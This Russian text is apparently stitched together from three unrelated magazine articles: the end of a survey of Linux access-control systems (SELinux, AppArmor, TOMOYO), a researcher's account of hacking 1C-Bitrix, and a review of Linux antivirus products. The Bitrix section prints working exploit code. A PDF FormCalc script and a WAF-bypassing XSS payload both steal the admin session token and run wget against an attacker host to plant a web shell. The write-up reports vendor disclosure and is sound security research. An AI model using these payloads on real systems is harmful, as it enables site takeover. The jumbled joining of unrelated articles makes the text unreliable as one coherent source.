Все вспомогательные утилиты SELinux собраны в нескольких пакетах: setools или policycoreutils, policycoreutils-newrole. Первый, как правило, уже установлен в системе, остальных нет. Например, newrole, дающая возможностьпользователю сменить роль, доступна именно в policycoreutils. После установки в системе присутствуют только наборы политик для targened, остальные наборы политик скачиваются в пакетах selinux-policy*. Сорцы политик для их самостоятельной сборки вынесены в selinux-policy-devel.

Разобраться в более чем 200 файлах, имеющих несколько тысяч строк, врукопашную очень трудно. Автоматизировать эту задачу призван питоновый скрипт audit2allow (в policycoreutils), он генерирует новые политики на основе анализа журналов и блокировок SELinux.

Проекты LIDS, GRSecurity и RSBAC

Кроме проектов, описанных в статье, в настоящее время развиваются и другие, позволяющие повысить защиту Linux-систем — LIDS (Linux Intrusion Detection System), GRSecurity и RSBAC (Rule Set Based Access Control). Кратко о них.

Проект LIDS реализует MAC, админ может четко указать разрешения для файлов и каталогов. Помимо этого механизмы TPE (Trusted Path Execution) и TDE (Trusted Domain Enforcement) позволяют убедиться, что программа работает так, как предназначено. Сайт проекта некоторое время был заброшен, хотя инструменты развиваются. Управление производится при помощи утилит и чем-то напоминает настройку правил файера.

# lidsconf -A -o /sbin -j READONLY

GRSecurity — разработка, охватывающая несколько технологий укрепления безопасности — MAC/ACL, улучшенный chroot, рандомизация TCP ISN и PID, ролевая система контроля доступа RBAC, функции аудита, защита адресного пространства и стека PaX (доступен и отдельно). Большинство параметров указывается на этапе сборки ядра, затем при помощи утилиты gradm настраиваются ACL.

Проект RSBAC, реализующий мандатный и ролевой механизмы доступа, уже в 2000 году вовсю использовался в защищенных дистрибутивах. По сути, это среда, позволяющая создать различные модели доступа. Идея основана на публикации Маршала Абрамса и Ла Падула «Обобщенная среда для управления доступом» (GFAC, Generalized Framework for Access Control). Кроме root в ОС появляется учетка администратора безопасности, который и управляет доступом к информации. Реализовано много интересных функций: отключение Linux DAC, сокрытие процессов, JAIL, поддержка PaX, антивирусный интерфейс Dazuko, контроль ресурсов Linux и многое другое. Например, можно организовать доступ к файлу в определенные часы.

AppArmor

Технология Application Armor изначально разработана Immunix Inc. После того, как софтверный гигант Novell приобрел эту компанию, код открыли под лицензией GNU GPL, а затем включили в состав openSUSE. ПозднееAppArmor стал доступен и в других дистрибутивах. Но когда команда Immunix покинула Novell, дальнейшее развитие проекта остановилось. И хотя в том же openSUSE поддержка AppArmor была сохранена, в дистрибутив интегрировали SELinux. В итоге начали разноситься слухи а-ля «AppArmor is dead», что у одних вызвало радость, так как теперь все усилия можно бросить на развитие одной системы защиты, у других критику — отсутствие конкуренции еще ни к чему хорошему не приводило. Сегодня апологетом этой технологии является Canonical, разработчики которого не смотря ни на что продолжают развитие AppArmor. Так, в последних версиях добавлен механизм кэширования правил, что позволило ускорить их загрузку. Для этих же целей, и чтобы защитить сетевые сервисы на раннем этапе загрузки, часть профилей вынесли в initramfs. И главное — в Ubuntu AppArmor прикрутили к LSM (Linux Security Modules), задействовав security_path вместо vfs.

Основная идея AppArmor состоит в том, что система защиты не должна быть сложной и не должна мешать. В отличие от SELinux, AppArmor не использует расширенные атрибуты и не зависит от файловой системы. Доступ к ресурсам определяется на основе профилей (profiles), которые привязаны к пути файла или каталога, причем самого файла может и не быть на момент активации профиля. Профиль разрабатывается индивидуально под каждое приложение. Хотя в этом есть и недостаток: при переносе файла в SELinux за ним полностью сохраняется контекст безопасности, в AppArmor — нет, но этого от него и не требовали. Хотя, если файл имеет два имени, и профиль блокирует доступ к одному из них, есть возможность работать с другим. Это следует учитывать. Также, если средствами SELinux можно предусмотреть несколько уровней доступа к объекту для разных субъектов, то AppArmorэтого не умеет. В настоящее время созданы профили для большинства популярных серверов и приложений, поэтому наличие активного AppArmor обычно незаметно, он не создает проблем. Кроме того, в комплекте поставки идут два скрипта aa-genprof и aa-logprof, которые помогут быстро создать профиль для новой программы. УправлениеAppArmor производится при помощи init-скрипта, который запускает модуль ядра, инициализирует профили и монтирует псевдофайловую систему securityfs.

$ sudo /etc/init.d/apparmor start

Чтобы просмотреть список загруженных профилей, достаточно считать файл /sys/kernel/security/apparmor/profiles (или запустить /etc/init.d/apparmor status); в зависимости от варианта дистрибутива Server/Desktop количество активных профилей будет различно. Сами профили хранятся в файлах (отдельно для каждого приложения) в каталоге /etc/apparmor.d и внутри содержат описание каталогов и отдельных файлов, с указанием прав доступа. Также указывается работа в сети и совместимость с другими профилями. Для упрощения задачи используются регулярные выражения. По умолчанию профили AppArmor работают в принудительном enforce-режиме. Когда сервис не может выйти за рамки установок, все попытки блокируются и фиксируются в журнале. При необходимости его можно перевести в щадящий режим complain, когда нарушения лишь фиксируются. Причем, в отличие от SELinux, где режим обучения активируется глобально, в AppArmor его можно включить для отдельного профиля. Перевести профиль в щадящий режим можно тремя способами:

• указать в файле профиля flags=(complain);
• использовать команду complain название_программы (вернуть командой enforce);
• или глобально командой «echo 1 > /sys/kernel/security/apparmor/control/complain».

А еще профили отключаются на лету, перегружаются, в общем, полная свобода действий. Собственно, простота и привлекает в AppArmor админов, разработчиков и простых пользователей.

Дополнительные профили можно найти в репозитории дистрибутива (apt-cache search apparmor), кроме того, есть онлайн-банк профилей — apparmor.opensuse.org.

К слову, для ядер 2.4/2.6 существовала разработка Trustees, реализующая ACL a-ля Novell Netware, которая в удобной форме расписывала доступ к каталогам вплоть до указания отдельных групп и пользователей и не зависела от файловой системы. К сожалению, проект заглох, а это была бы золотая середина между SELinux и AppArmor.

Сбиваем спесь со Skype

Наверное, больше всего претензий с точки зрения безопасности у пользователя вызывает Skype. Куда только не лезет эта прога (см. статью Криса «Skype: скрытая угроза«). Описываемые технологии как раз и позволяют обезопасить себя. Забегая вперед, скажу, что пользователи уже давно нагенерировали профили для большинства популярных прог, и скайп здесь не исключение. Смотри, например, здесь: www.cynapses.org/tmp/apparmor/usr.bin.skype. Некоторые профили собраны в отдельном пакете — apparmor-profiles. Но профиль легко создать и самому. Для этого в комплекте идет утилита aa-genprof (или просто genprof). Запускаем ее с указанием исполняемого файла в качестве параметра:

$ sudo aa-genprof /usr/bin/skype

Далее работаем как обычно: звоним, отсылаем сообщения, принимаем файлы, добавляем и удаляем учетки. По окончании прерываем работу в каталоге /etc/apparmor.d/usr.bin.skype. Затем перезапускаем AppArmor или просто активируем профиль в enforce-режиме:

$ sudo aa-enforce skype

Все проблемы и замечания по работе профилей AppArmor ищи в логах.

TOMOYO Linux

Проект TOMOYO Linux начат в 2003 году японской компанией NTT DATA CORPORATION как легкая реализация MAC для Linuх-ядра. Через два года лицензию изменили на GNU GPL и выложили код на SF.net. Некоторое время проект предоставлял патчи и готовые сборки ядер для разных дистрибутивов. Но начиная с версии ядра 2.6.30, кодTOMOYO Linux включен в основную ветку разработки, что уже само по себе — Событие для любого подобного проекта.

В настоящее время существует две версии TOMOYO Linux. Первая версия использует оригинальные хуки, она доступна только в виде патчей и может использоваться в ядрах 2.4 и 2.6. Вторая (которая уже в ядре) адаптирована под LSM, но по функциональным возможностям уступает версии 1.х: нет поддержки сетевых функций, обработки атрибутов, POSIX-возможностей (на сайте представлена сравнительная таблица). В настоящее время соответствующие пакеты имеются в репозиториях многих дистрибутивов, но фактически поддержка заявлена пока только в Mandriva. К слову, в этом дистрибутиве предлагается и графический интерфейс Tomoyo GUI, позволяющий запустить и настроить политики приложений. Доступность в репозиториях пакетов для большинства дистрибутивов позволяет буквально в считанные минуты перевести ОС на новую систему безопасности. Например, Ubuntu 10.04:

$ sudo echo 'deb http://osdn.dl.sourceforge.jp/tomoyo/47128/ ./' >> /etc/apt/sources.list
$ sudo apt-get update
$ sudo apt-get install linux-ccs ccs-tools

Если ядро собирается самостоятельно, активируй параметр «Enable different security models» и «TOMOYO Linux Support» в секции Security options.

При беглом взгляде TOMOYO очень похож на AppArmor. Обе системы контролируют путь (pathname based), а правила имеют сходный синтаксис. Но есть и отличия. Так, в TOMOYO можно указать поведение программы в зависимости от того, как она запущена. Например, оболочка, запущенная через SSH, может иметь больше ограничений, чем запущенная с локальной системы. Предусмотрена проверка дополнительных параметров, с которыми включена программа, а также привилегий (UID/GUD). Приложения в терминологии TOMOYO называются доменами (domains). Конфигурационные файлы TOMOYO находятся в каталоге /etc/tomoyo, после запуска системы настройки имеют свое отражение в /proc/tomoyo, где их можно редактировать на лету. Параметры работы TOMOYOхранятся в /etc/tomoyo/profile.conf и доступны в /proc/tomoyo/profile. Именно здесь определяются режимы работыTOMOYO — disable, permissive, enforsing и learning (обучаясь, система сама строит правила). Есть и другие файлы:

• manager.conf (/proc/tomoyo/manager) — программы, которые могут изменить политику в /proc/tomoyo;
• exception_policy.conf (/proc/tomoyo/exception_policy) — исключения для политик домена;
• domain_policy.conf (/proc/tomoyo/domain_policy) — политики домена;
• meminfo.conf (/proc/tomoyo/meminfo) — настройка использования памяти и квот.

После установки пакета ccs-tools необходимо провести инициализацию TOMOYO, выполнив скрипт /usr/lib/ccs/tomoyo_init_police.sh, который и создаст нужные конфиги. Далее потребуется перезагрузка системы. Затем можно запускать редактор политик:

# /usr/lib/ccs/editpolicy /etc/tomoyo/

Еще одна немаловажная черта — TOMOYO может работать параллельно с SELinux и AppArmor.

Предыстория

Во время чтения множества статей по безопасности и описаний уязвимостей мне всегда становится интересно, какие действия исследователя предшествовали нахождению той или иной уязвимости. Интересно лишь с одной целью — понимать, какие шаги делал исследователь, какие попытки предпринимал, что не получилось, какие средства и утилиты он использовал. Выясняя все это, можно сильно расширить свой кругозор, а нередко и просто довести до ума какие-то незавершенные идеи. Кроме того, вводные части очень разбавляют технический текст и делают его интереснее. Как говорится, «хочешь сделать мир лучше — начни с себя», поэтому постараюсь описать весь процесс поиска уязвимостей как можно более подробно.

А началось все с Форба, который как всегда ненавязчиво предложил написать образцовую статью на тему взлома CMS. На тот момент у меня была только одна заготовка — идея использования атрибута filesize для hijacking в Internet Explorer. Это была действительно сырая идея,  хотя и пришлась по нраву Дэну Камински. В любом случае, на добротную статью этого явно не хватало.

Пообещав Форбу ответить до вечера, я попробовал использование атрибута filesize в демо-версии Internet Explorer 9. Разработчики обещали поддержку формата SVG в тэге IMG, и, надеясь, что filesize будет определяться не только от SVG, но и от любого другого XML, можно было заюзать его для определения размера любых XML-ответов веб-приложения, что уже очень немало. Но, к сожалению, фортуна повернулась мягким местом, и filesize от XML всегда возвращал 0. Твердо решив написать новую и интересную статью, я стал просматривать веб-приложения, которые было бы интересно исследовать. Одним из первых в этом списке был 1С-Битрикс, на котором я и остановился. К слову, Битрикс — очень интересный движок, непростой, проверенный аудиторами, имеющий встроенные механизмы защиты от проведения атак. На эти механизмы есть сертификат по «соответствию требованиям Web Application Firewall Evaluation Criteria международной организации Web Application Security Consortium», кроме того, система имеет сертификат ФСТЭК по классу защиты от несанкционированного доступа. Так что исследование обещало быть интересным. Последний раз до этого я интенсивно изучал Битрикс версии 8.0.5 на CC09, где предлагалось обойти фильтр WAF, который препятствует проведению атак. На момент написания статьи актуальной версией была 9.0.3, которая, ко всему прочему, обзавелась новым механизмом защиты — «веб-антивирусом». Загрузив последнюю версию движка с официального сайта, я принялся за работу.

Первый баг — колом!

Первым делом я решил провести проверку системы ручным способом, просто щелкая по менюшкам и изучая функционал. Буквально сразу обратил внимание на BB-тэги, которые можно было использовать во встроенном редакторе при написании сообщений на форум, блог или комментарии. Чтобы проверить, как BB превращаются в нормальные HTML-тэги, и что при этом фильтруется, я создал сообщение, куда поместил все тэги с разными спецсимволами, как в значениях, так и на месте атрибутов. Отправив такое сообщение на свой форум в Битриксе, я принялся рассматривать полученный HTML-код. Удивление пришло, когда кусок кода страницы в явном виде показал XSS. Это был самый банальный и самый изъезженный XSS при обработке:

[URL=a' attribute='blabla']XSS[/URL]

Ради спортивного интереса посмотрел на часы — прошло четыре минуты с начала «исследования». Оставив такой вектор атаки на потом, про себя заметил, что придется еще обходить фильтр WAF, который не пропустит наивные попытки записать атрибут onload, style, onmouseover и другие классические атрибуты при эксплуатации уязвимости.

Второй акт

Продолжив бессистемное изучение функционала движка, я проверил еще несколько догадок, и все они оказались безуспешными. Кроме того, заметил странную особенность — при отправке запросов к системе от администратора, данные из них не фильтруются WAF. Сначала мне даже показалось, что «проактивная защита» просто не срабатывает. Недолго думая, я сразу написал письмо разработчикам Битрикс, которые очень заботятся о безопасности системы и всегда быстро отвечают на мои письма. Как разъяснили разработчики, запросы, посылаемые от администратора и содержащие дополнительный защитный параметр sessid, не фильтруются WAF. Это и логично — в  системе ведь присутствуют администраторские утилиты выполнения SQL-запросов и PHP-кода, а если фильтровать их через WAF, они просто не будут работать. Стоп! Выполнение PHP-кода возможно сразу из админки, официально, ничего придумывать даже не надо, просто провести атаку CSRF, и вот он — веб-шелл! Таким образом, мне оставалось только обойти WAF, чтобы провести атаку типа «XSS+CSRF+WAF by pass» и получить веб-шелл. Настроение сильно улучшилось .

Техническая PDFержка

Перебирая разные параметры в движке, я хотел было уже закончить поиски уязвимостей и перейти к изучению защиты WAF. Но тут очередь дошла до модуля «Техническая поддержка». Пользователю предоставлялась возможность создавать обращения к техперсоналу с описанием своих проблем. К каждому тикету можно прикрепить файл. Не задумываясь о последствиях, я создал новый тикет и прикрепил к нему произвольный файл, который по случаю оказался PDF-документом. Затем перелогинился от администратора и посмотрел, что же отобразится в журнале заявок. Вся фильтрация работала на ура, но вот документ…

Щелкнем по ссылке с документом — его контент отобразился плагином Adobe Acrobat прямо в браузере на домене подопытного Битрикса. Тут что-то щелкнуло в голове, и память (уже нейронная, а не оперативная) принесла информацию о том, что внутри PDF может содержаться исполнимый JavaScript. Все срасталось — браузер, cookies, нужный домен, JavaScript. Теперь уже вектор стал совершенно очевиден: надо научить PDF выполнять GET- и POST-запросы к серверу, тогда мы получаем CSRF в чистом виде, а затем, опять-таки, веб-шелл. Здесь «проактивная защита» или WAF уже никак не помешает — ведь контент PDF-документа ей не по зубам. Спортивный интерес опять побудил посмотреть на часы — прошло три с половиной часа с начала работы.

PDF CSRF Exploit

Теперь уже идея использовать PDF для проведения CSRF казалась более чем хорошей. Под атаку попадала масса веб-приложений и веб-сервисов. Стоило углубиться в документацию, методы создания PDF-документов и сделать пример «вредоносного» документа. Тут меня ждали две преграды. Во-первых, PDF поддерживает JavaScript лишь отчасти, и ни о каких HTTP-запросах речи здесь быть не может. Во-вторых, Adobe Acrobat имеет встроенный механизм защиты, который спрашивает подтверждения пользователя при взаимодействии документа с сетью. Бросать такую идею совершенно не хотелось, так что изучение документации продолжилось, и очень скоро принесло свои плоды. Обнаружилось, что помимо JavaScript в PDF-документах можно использовать второй язык — FormCalc. Google помог скачать полный список функций этого зверя: help.adobe.com/en_US/livecycle/es/FormCalc.pdf. Самое вкусное, как всегда, оказалось в конце, и последний, десятый раздел мануала назывался коротко и ясно — «URL functions». Содержание раздела говорило само за себя — «Get, Post, Put». Теперь для проведения атаки необходимо было сделать PDF-документ, который бы реализовывал атаку по следующей схеме:

1. Отправка GET-запроса в админку по адресу targethost:6448/bitrix/admin/user_admin.php?lang=ru.
2. Обработка результата запроса, получение из него sessid.
3. Отправка POST-запроса с sessid и командой «wget http://evilhost.ru/s.txt -O shell.php» по адресу targethost:6448/bitrix/admin/php_command_line.php?mode=frame&lang=ru.

На языке FormCalc такой сценарий описывался тремя строчками кода:

var a = Get("http://targethost:6448/bitrix/admin/user_admin.php?lang=ru")
var sessid = (Substr(a,At(a,"sessid=")+7,32))
Post("http://targethost:6448/bitrix/admin/php_command_line.php?mode=frame&lang=ru",Concat("sessid=",sessid,"&query=system%28%27wget http://evilhost:6448/s.txt –O shell.php%27%29%3B"),"application/x-www-formurlencoded")

Для создания PDF-документа можно было воспользоваться триальной версией Adobe Livecycle Designer, но дистрибутив весил целых 3 Гб. Поэтому я решил скачать готовый PDF с каким-нибудь скриптом и просто заменить текст самого скрипта. Для работы с форматом PDF нашлась прекрасная бесплатная библиотека iText под Java. Функция для замены скрипта в документе получилась такая:

public static void replacePDFScript(String filename, String script)
{
try
{
PdfReader reader = new PdfReader(filename);
XfaForm xfa = new XfaForm(reader);
Document doc = xfa.getDomDocument();
NodeList list = doc.getElementsByTagName("script");
list.item(0).setTextContent(script);
PdfStamper stamper = new PdfStamper(reader, new FileOutputStream(filename+"_mod.pdf"));
xfa.setDomDocument(doc);
xfa.setChanged(true);
XfaForm.setXfa(xfa, stamper.getReader(), stamper.getWriter());
stamper.close();
}
catch (Exception e) {
e.printStackTrace();
}
}

Согласись, использовать сие всяко проще, чем скачивать 3 Гб платного софта. Теперь немного о том, что касается ограничений безопасности Adobe Acrobat на отправку запросов из документа. Сам PDF-документ, ясное дело, может быть открыт как через ActiveX-компонент Adobe Acrobat в браузере, так и напрямую из локального файла в окне Acrobat’а. По умолчанию все запросы, которые посылает PDF-документ, требуют подтверждения со стороны пользователя. Высвечивается окно с предложением разрешить отправку запросов с домена, на котором расположен документ. Замечу, что ограничения именно для домена отправителя, а не как это принято обычно — для домена, куда осуществляется запрос. Если же открывается локальный файл, то санкция устанавливается на имя файла, что, кстати, может быть использовано для атаки с подменой содержимого. Но вот если документ открыт через браузер, и запрос отправляется на тот же домен, на котором расположен документ, никаких ограничений безопасности не срабатывает! Такой вариант открытия документа и присутствовал в Битриксе на момент исследования. Собственно, на этом PoC-эксплоит был готов. Я зашел от имени нового пользователя в свой локальный Битрикс, на котором проводил эксперименты, создал заявку в модуле «техническая поддержка» и прикрепил к ней полученный PDF. Затем перелогинился от администратора и просмотрел заявку от пользователя, после чего открыл содержащийся в ней документ. На экране отобразился совершенно чистый белый лист, никаких предупреждений, никаких сообщений. Результат работы эксплойта красовался по адресу http://targethost:6448/bitrix/admin/shell.php.

Получилась очень показательная демонстрация атаки CSRF, которая часто критически недооценивается разработчиками. Если строго подходить к классификации, уязвимость, конечно, не простая CSRF. Здесь злоумышленник может изменять заголовки HTTP-запроса, и главное — работать с ответом сервера.

Вау, WAF!

Красивая реализация CSRF через PDF подстегнула проделать аналогичный трюк с помощью первой обнаруженной уязвимости XSS. Но для этого необходимо было обойти «проактивную защиту», которая уже была исправлена с момента моих последних раскопок (см. статью «Сказки XSSахеризады«). Тут было два вектора атаки — найти способ обхода фильтрации либо существующих выражений, либо не фильтруемых. Учитывая, что первый вектор я уже исследовал и показал на СС09, решил пробиваться по второму. Тут ничего нового не придумаешь, воспользовался методами, описанными в статье «Сказки XSSахеризады» и полез в документацию на броузерные HTML. 15 минут раскопок принесли плоды — под InternetExplorer нашлись два метода onmouseenter и onmouseleave. Это аналоги фильтруемых WAF исключений onmouseover, onmouseout. То, что доктор прописал . Чтобы сделать атаку кросс-браузерной, пришлось еще немного порыться в документации… и в итоге нашелся интересный метод onselectstart, который работал и в IE, и в Chrome. Причем в случае с Chrome ивент срабатывает просто при клике, а для IE требуется еще провести по тексту, как при выделении. На этом этапе уже ничто не мешало осуществить второй вариант CSRF и, опять-таки, получить веб-шелл. К сожалению, день уже заканчивался, с момента начала исследования прошло семь часов, оформить все найденное в приличные advisory я уже не успевал, поэтому просто пошел спать.

Антракт и третий акт

Через несколько дней удалось снова выкроить время и вернуться к исследованию движка. Первым делом был написан advisory и отправлен разработчикам. Нехитрый список уязвимостей содержал CSRF via PDF, XSS в тэге [URL] и новые методы обхода WAF. Теперь надо было написать пример для заливки шелла через две уязвимости (XSS+WAF bypass). Я знал, что WAF фильтрует не только ивенты, но и функции и переменные, которые он считает опасными, в самом JavaScript, и морально приготовился к мучительным видоизменениям кода. Логично, казалось бы, было использовать обфускатор jjencode. Но в данном случае он был неприменим из-за того, что любой символ закрывающейся квадратной скобки закрывал тэг URL, в котором была уязвимость, и отсекал весь остальной код за собой. Ну, а квадратные скобки встречаются в jjencode на каждом шагу.

Поэтому пришлось идти другим путем. Логика эксплойта должна была быть следующей:

1. Создаем объекты iframe, form, два поля input (параметры POST sessid и query).
2. В iframe загружаем какую-нибудь страницу админки и получаем из него innerHTML.
3. Выдираем из innerHTML нашего iframe значение sessid.
4. Проставляем значение sessid в value атрибут первого объекта input.
5. Выполняем form.submit.

Единственным, что мешало написанию эксплойта со стороны системы, была фильтрация метода onload. Конечно, можно было написать конструкцию типа i[“onload”]=a, но, опять-таки, квадратные скобки не были допустимы для данной уязвимости. Пришлось снова придумывать. Придумка оказалось простой, как валенок — setTimeout(a,10000). Рассчитано на то, что содержимое iframe загрузится раньше 10 секунд, функция a сможет выдрать значение sessid. В остальном никаких хитростей применено не было. Код получился вот такой:

[URL=http://a' onmouseenter='var i=document.createElement("iframe");
i.style.width="0px";
i.style.height="0px";
var p=/sessid=.{32}/;
var t="";
var f=document.createElement("form");
f.method="POST";
f.action="/bitrix/admin/php_command_line.php?mode=frame";
var s=document.createElement("INPUT");
s.style.visibility="hidden";
s.type="text";
s.name="sessid";
var y=document.createElement("INPUT");
y.style.visibility="hidden";
y.type="text";
y.name="query";
y.value="system(\"wget htt\".\"p://evilhost:6448/s.txt -O s.php\");";
f.appendChild(s);
f.appendChild(y);
function b(){t+=i.document.body.innerHTML.match(p);
s.value=t.substr(7);
f.submit()};
i.src="/bitrix/admin/";
document.body.appendChild(i);
document.body.appendChild(f);
setTimeout(b,10000);
']НАВЕДИ НА МЕНЯ![/URL]

У такого PoC есть два недостатка — он работает только под Internet Explorer и открывает новую страницу с результатом выполнения команды шелла (пустую, если все прошло хорошо, и шелл залился). Эти два недостатка с легкостью лечатся, но в этой статье более элегантного решения не будет дано специально. Моя цель — показать возможность проведения атаки, а не дать в руки готовый инструмент для взлома.

Сладкое на закуску

Итак, мне удалось провести две успешные атаки самого себя и залить два веб-шелла. В завершение исследования я еще раз оглядел весь движок, по большей части для того, чтобы просто изучить функционал. Случайно наведя мышкой на надписи с именем автора записи в блоге, я увидел, что при этом открывается всплывающее окно, в котором отображается само сообщение. Это выглядело очень красиво — дизайн окошка был оформлен под облачко из комиксов. Но меня насторожило, что в этом окошке выводится также значение поля ICQ из профиля пользователя. Причем при выводе не фильтруется ни < >, ни ‘ “. Как же просто было при сохранении в базу ограничить поле ICQ в профиле пользователя только цифрами! Это ведь так логично! Но вместо простого решения — уязвимость. Это была третья возможность заливки шелла. В отличие от варианта с [URL] здесь можно было разгуляться — jjencode и целые тэги, а не только атрибуты. Кроме того, можно использовать уязвимости XSS для фишинг-атак. Придумывать еще один метод обхода WAF для проведения атак без участия со стороны пользователя, таких как клики и наведения мышкой, мне уже не хотелось. Быстрое исследование, которое заняло полтора дня, решено было закончить, а обнаруженная уязвимость также ушла разработчикам.

Финал

Все, что было обнаружено, уже должно быть исправлено в новом Битриксе на момент публикации этой статьи. Всегда до публикации следует оповещать разработчиков и согласовывать сроки публикации. Так и было сделано. Находить уязвимости и взламывать сайты — это две совершенно разные задачи. А если учесть масштабы распространения Битрикса в рунете — последствия атак могли бы быть весьма внушительными. Исследователь — не взломщик, он энтузиаст, стремится показать, где программа недоработана, и в итоге способствует тому, чтобы его продукт стал более защищен. На этом снимаю перед тобой шляпу и откланиваюсь. И замечу (на всякий случай), что в ходе исследования ни один живой сайт не пострадал. Как всегда, на вопросы отвечаю в блоге oxod.ru.

Казалось бы, можно считать за аксиому, что если на платформе есть вирусы — то нужен и антивирус. Но с Linux не все так просто. Да, вирусы под Linux есть, но в 99% случаев — это черви, умеющие эксплуатировать одну-единственную уязвимость в конкретном сервисе и, как правило, конкретном дистрибутиве (так как версия сервиса, настройки, да и параметры компиляции меняются от дистрибутива к дистрибутиву). Хорошим доказательством этого факта может служить, например, Linux.Ramen (использующий уязвимости в wu-ftpd на Red Hat 6.2 и 7.0), макрочервь Badbunny для OpenOffice или тот же червь Морриса.

Однако практически у каждого производителя антивирусов есть версия под Linux. Правда, чаще всего это версия для почтового сервера, шлюза или общего файлохранилища, для защиты виндовых клиентов. Но последнее время начало расти количество антивирусов для Linux-десктопа. И производители соответствующих продуктов пугают «прибывающим в геометрической прогрессии количеством малвари под Linux». Использовать или нет антивирус на Linux-десктопе – личное дело каждого. По мне – так пока популярность Linux на десктопах не превысила 1-2%, и производители популярных дистрибутивов своевременно выпускают security-апдейты – бояться нечего. Но бывают ситуации, когда надо проверить винт с виндой на вирусы или флешку перед тем, как отдать кому-нибудь. В таких случаях и может пригодиться антивирь под Linux.

Вообще, тестирование антивирей – дело неблагодарное, поскольку какого-то объективного теста не существует, и все очень сильно зависит от тестового набора вирусов (чем с успехом пользуются производители, периодически вынося на суд общественности тесты, неоспоримо доказывающие, что их антивирус «самый-самый»). Так как во всех линуксовых антивирусах базы и ядро идентичны виндовой версии, можно смело оценивать эффективность антивирусов под Linux по тестам виндовых версий.

Платно

За большинство подобных антивирусов производители просят деньги. Если антивирус делался с прицелом на корпоративных клиентов, он и стоить будет неплохих денег. Но если антивирь нужен «на пару раз», то можно обойтись и триальной лицензией (благо, большинство производителей ее предоставляют).

Обзор начну с Dr.Web для Linux, так как в апреле вышла «революционная» версия под номером 6 с новыми интересными возможностями и графическим интерфейсом. Имеется поддержка как 32-, так и 64-битных дистрибутивов. Установка элементарна – с официального сайта скачивается .run-файлик, при запуске которого появляется графический установщик. После пары нажатий кнопки «Далее» продукт будет установлен. Если лицензионного ключа пока нет, то во время установки можно запросить с сервера компании демо-ключ на 30 дней (демо-ключ можно запрашивать не чаще 1 раза в 4 месяца). После установки в меню Gnome появится пункт «DrWeb» (с двумя подпунктами: запуск антивируса и его удаление), а в трее появится симпатичная, но не очень подходящая под дефолтную убунтовскую тему иконка, символизирующая работу файлового монитора.

CLI-сканер тоже есть, для сканирования текущего каталога запускается так:

$ /opt/drweb/drweb ./

Если ругнется на отсутствие файла с ключом, то запускать с указанием ini-файла, например:

$ /opt/drweb/drweb -ini=/home/adept/.drweb/drweb32.ini ./

Итого, за 799 рублей в год пользователь получит антивирус с графическим (GTK) и CLI интерфейсом, интеграцией с DE, антивирусным сканером и монитором, проверяющим файлы при обращении к ним. Учитывая общее с версией под винду ядро и базы – довольно выгодное предложение для тех, кому для спокойного сна нужен платный антивирус для Linux-десктопа.

В отличие от Dr.Web, в Лаборатории Касперского считают, что домашнему Linux-пользователю антивирус совсем не нужен. А вот в корпоративном секторе может и пригодиться. Поэтому Антивирус Касперского для Linux Workstation нельзя купить отдельно, только в составе Kaspersky Total Space Security, Kaspersky Enterprise Space Security, Kaspersky Business Space Security или Kaspersky Work Space Security (то есть, от 7700 рублей в год). Обновляется версия под Linux не очень активно – последний релиз (5.7.26) был аж в октябре 2008. На сайте доступны deb и rpm, заявлена поддержка как 32-, так и 64-бит. При установке сразу требует выдать ему файл с лицензионным ключом (который можно запросить на офсайте для тестирования), предлагает настроить прокси и скачать последние версии баз, а также может установить специальный модуль для webim и скомпилировать модуль ядра kavmonitor (позволяет перехватывать вызовы ядра на обращения к файлам и проверять эти файлы на вирусы). К сожалению, kavmonitor не поддерживает ядра новее 2.6.21 (для 32-битных систем) и 2.6.18 (для 64-битных), поэтому на всех более-менее новых дистрибутивах придется обойтись без него. Графического интерфейса у антивируса нет, только CLI. Запускается следующим образом:

$ sudo /opt/kaspersky/kav4ws/bin/kav4ws-kavscanner /tmp

Обновить базы можно так:

$ sudo /opt/kaspersky/kav4ws/bin/kav4ws-keepup2date

Основные настройки антивируса хранятся в конфиге /etc/opt/kaspersky/kav4ws.conf.

Еще один популярный у нас на родине производитель антивирусов – ESET – тоже имеет версию для Linux-десктопов (ESET NOD32 Antivirus 4 for Linux Desktop), которая, правда, пока носит статус бета-версии. Зато бета-версию можно абсолютно бесплатно использовать до определенной даты. После выхода релиза, скорее всего, бесплатно можно будет использовать только триальную версию. Поддерживаются архитектуры x86 и x86-64, установка происходит с помощью графического инсталлятора. По умолчанию антивирус ставится в /opt/eset. После установки нас приветствует лаконичный интерфейс на GTK и иконка в системном трее, символизирующая работу файлового монитора. Интерфейс можно переключить в «режим эксперта», в котором добавится пара пунктов: Setup (для настройки сканера и монитора) и Tools (для просмотра логов и файлов, находящихся на карантине). Есть также CLI-сканер, сканирование текущего каталога:

$ /opt/eset/esets/sbin/esets_scan ./

Опция ‘-h’ покажет возможные опции сканирования.

Еще один достаточно крупный производитель антивирусных решений, имеющий Linux-версии своих антивирусов – McAfee. Вообще, если оценивать только их Linux-продукты, то вендор довольно странный (к слову, единственный, у кого веб-сайт крутится на IIS – ничего личного, просто статистика ). Вместо All-in-one решения в их продуктовой линейке есть несколько отдельных решений для Linux: LinuxShield (монитор, проверяющий файлы при обращении) иVirusScan Command Line Scanner for Linux. LinuxShield стоит приблизительно в 2 раза дороже. Зато Command Line Scanner есть не только под Linux (x86 и x86-64), но и практически под все мыслимые ОС: Windows, FreeBSD, Solaris, HP-UX и AIX. McAfee позиционирует свои продукты как решения только для крупных компаний, поэтому у партнеров можно купить не меньше 11 лицензий каждого наименования продукта, а прежде чем скачать пробную версию, надо заполнить самую большую регистрационную анкету, в которой подробно рассказать про свою компанию.

Command Line Scanner устанавливается скриптом install-uvscan из скачанного архива. При установке скрипт задаст пару вопросов (куда установить и сделать ли симлинки) и предложит сразу проверить всю ФС. Сканер не рассчитан на работу с новыми дистрибутивами, поэтому без плясок с бубном на Ubuntu 10.04 не завелся, ругнулся на отсутствие libstdc++.so.5. Пришлось ставить из дебиана. Это единственный антивирусный сканер, не имеющий какой-либо утилиты для обновления. Новые базы предлагается скачивать самостоятельно и складывать в инсталляционную директорию. Для сканирования текущей директории набираем:

$ uvsan ./

Команда «man uvscan» поведает о большом количестве возможных опций разной степени полезности.

LinuxShield официально поддерживает только RHEL и SLED, для других дистрибутивов (и, соответственно, других ядер) необходимо пересобирать ядро с модулями антивируса. Сомнительное удовольствие – пересобирать ядро при каждом апдейте из-за одних только антивирусных модулей. К тому же не факт, что модули соберутся с ядрами новее 2.6.18.

Халява

Некоторые производители для привлечения внимания к своей продукции выдают бесплатные ключи для домашнего использования (в том числе и Linux-версий).

